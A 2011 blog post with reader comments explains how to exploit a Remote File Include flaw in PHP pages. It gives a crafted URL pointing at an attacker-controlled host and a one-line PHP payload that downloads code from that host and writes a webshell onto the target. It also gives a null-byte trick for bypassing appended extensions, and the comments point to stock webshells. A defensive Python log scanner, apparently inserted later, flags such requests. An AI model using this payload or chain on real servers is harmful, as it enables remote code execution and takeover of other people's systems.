Saturday 5 March 2011

How to exploit RFI (Remote File Include) vulnerability on webpages.



Hi everyone, this post is very similar to the one I just made on LFI; the only difference is that with RFI you can get your own code onto the remote server more easily.
So, this is our vulnerable webpage:
http://mytargettest.com/hacktest/rfi.php?COLOR=color.css
But instead of loading the file color.css, we will make it load our own code from our box, like this:

http://mytargettest.com/hacktest/rfi.php?COLOR=http://172.16.1.79/exploits/evil3.txt

The content of evil3.txt is :

<?php $z=fopen('./shell.php','w');fwrite($z,file_get_contents('http://172.16.1.79/exploits/back.txt'));fclose($z); ?>

Notice that the file's extension is .txt. There is a reason for that: if you use .php, the code will be interpreted by the pentest server instead of by the target server, so don't forget to use .txt for your evil code.
Great, we just uploaded our shell to the server; now browse to it: http://mytargettest.com/hacktest/shell.php
Now you can repeat what I did in the LFI post to get a real shell on the server.

Another tip: some developers append an extension such as .css or .php to the included filename. So how can we get around that? Just add a NULL byte at the end of the URL.
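As an added defensive example (not part of the original post), the following Python scans web-server access-log lines for the request patterns described above: a remote URL supplied in an include parameter, and a trailing null byte used to defeat an appended extension. The log lines, IPs and paths are constructed for illustration and are not real traffic.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (Apache combined-style), not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Mar/2011:10:00:01 +0000] "GET /hacktest/rfi.php?COLOR=color.css HTTP/1.1" 200 512
10.0.0.9 - - [05/Mar/2011:10:00:07 +0000] "GET /hacktest/rfi.php?COLOR=http://172.16.1.79/exploits/evil3.txt HTTP/1.1" 200 88
10.0.0.9 - - [05/Mar/2011:10:00:12 +0000] "GET /hacktest/rfi.php?COLOR=http%3A%2F%2F172.16.1.79%2Fexploits%2Fevil3.txt%00 HTTP/1.1" 200 88
10.0.0.9 - - [05/Mar/2011:10:00:20 +0000] "GET /hacktest/shell.php HTTP/1.1" 200 1024
10.0.0.7 - - [05/Mar/2011:10:01:00 +0000] "GET /hacktest/rfi.php?COLOR=../../etc/passwd%00 HTTP/1.1" 200 2048
"""

# Minimal parser for the fields we need: client IP, request target, status.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Schemes that PHP's include() can fetch from when allow_url_include is on.
REMOTE_SCHEME_RE = re.compile(r'^(?:https?|ftps?|php|data|expect)://', re.IGNORECASE)


def classify_value(value: str) -> list[str]:
    """Return the RFI/LFI indicators present in one URL-decoded parameter value."""
    findings = []
    if REMOTE_SCHEME_RE.match(value.strip()):
        findings.append("remote-url")   # include of an attacker-hosted file (RFI)
    if "\x00" in value:
        # Truncation of include paths at a null byte was removed in PHP 5.3.4,
        # but the request is still an unambiguous attack indicator.
        findings.append("null-byte")
    if "../" in value or "..\\" in value:
        findings.append("traversal")    # local file include via path traversal
    return findings


def scan_access_log(log_text: str) -> list[dict]:
    """Parse log lines and flag every query parameter carrying RFI/LFI indicators."""
    alerts = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        # parse_qsl percent-decodes values, so %00 becomes a real null byte here.
        for name, value in parse_qsl(query, keep_blank_values=True):
            indicators = classify_value(value)
            if indicators:
                alerts.append({"ip": m.group("ip"), "status": m.group("status"),
                               "param": name, "indicators": indicators})
    return alerts


if __name__ == "__main__":
    for alert in scan_access_log(SAMPLE_LOG):
        print(alert)
```

A 200 status on a flagged request is the line to investigate first: it means the include succeeded, not merely that it was attempted.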

7 comments:

  1. You should read the whole post.
    "If you notice the extension of the file is .txt, there is a reason for that, if you put .php, the code will be interpreted by the pentest server instead the target server, don't forget to put .txt in your evil code."

    Replies
    1. I mean the file back.txt at that site, because it is not active.
      Where can I find it?
      Can you send me by mail?

  2. back.txt is your "evil" code, that can be anything... your shell, commands, anything... if you want a shell, inside BackTrack there are some in /pentest/backdoors/web/webshells/

    Have a look.
    I don't speak italian.

  3. OOOOOOOOOkay, now i understand :)
    Thanks a lot!
